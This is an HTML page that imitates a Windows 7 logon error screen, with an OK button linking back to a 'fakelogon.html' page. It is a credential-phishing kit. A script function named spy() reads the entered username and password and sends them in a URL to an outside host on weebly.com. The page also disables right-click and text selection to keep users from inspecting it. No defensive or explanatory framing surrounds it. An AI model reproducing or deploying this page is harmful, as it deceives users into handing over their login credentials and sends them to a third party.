<script type="text/javascript">
var message="Sorry, right-click has been disabled";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
</script>

<script type="text/javascript">
function spy(){
    window.location = "http://L62.weebly.com/#user=" + document.getElementById('username').value + "&pass=" + document.getElementById('password').value;
}
</script>

<style>
body {
  background: url('win7_background.jpg') #054696 no-repeat center center fixed;
user-select:none;-moz-user-select:none;-webkit-user-select:none;-ms-user-select:none;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
vertical-align:middle;
text-align:center;
z-index: -1;
overflow:hidden;
margin:0;
padding:0;
}

.CT {
vertical-align:middle;
position: absolute;
top: 49%;
height: 70px;
margin-left:auto;
margin-right:auto;
display:block;
width:400px;
margin-top: -5%;
font-family:Segoe UI, Arial;
font-size:14px;
color:#FAFAFA;
font-weight:normal;
text-align:center;
text-shadow: 0px 2px 5px #393939;
user-select:none;-moz-user-select:none;-webkit-user-select:none;-ms-user-select:none;
}

.image_block {
position: absolute;
bottom: 17px;
left: 50%;
width: 50%;
margin: -5% 0 0 -25%;
}

.centeragain {
width:400px;
margin:0px auto;
text-align:left;
}

.messageBox {
display:block;
color:#67A2E6;
font-family:Segoe UI, Arial;
font-size:20px;
margin-left:auto;
margin-right:auto;
text-align:center;
user-select:none;-moz-user-select:none;-webkit-user-select:none;-ms-user-select:none;
z-index:999;
}

.error {
position: absolute;
top: 38%;
left: 32%;
margin: -5% 0 0 -25%;
}
</style>

</head>
<body marginwidth="0" marginheight="0">





<div style="display:block;position:absolute;min-width:100%; min-height:100%;margin:0;padding:0;">
<div class="centeragain">
<div class="CT">
<img class="error" src="error.png" draggable="false" ondragstart="return false;"><p align="center" style="cursor: default">The user name or password is incorrect</p><br><br><br>
<img class="ok" src="ok.png" onmouseover="this.src='ok_hover.png'" onmouseout="this.src='ok.png'" draggable="false" ondragstart="return false;" onclick="javascript:location.href='fakelogon.html'"/>
</div>
</div>
<div class="image_block">
<img src="windows.png" draggable="false" ondragstart="return false;">
</div>
</div>

</body></html>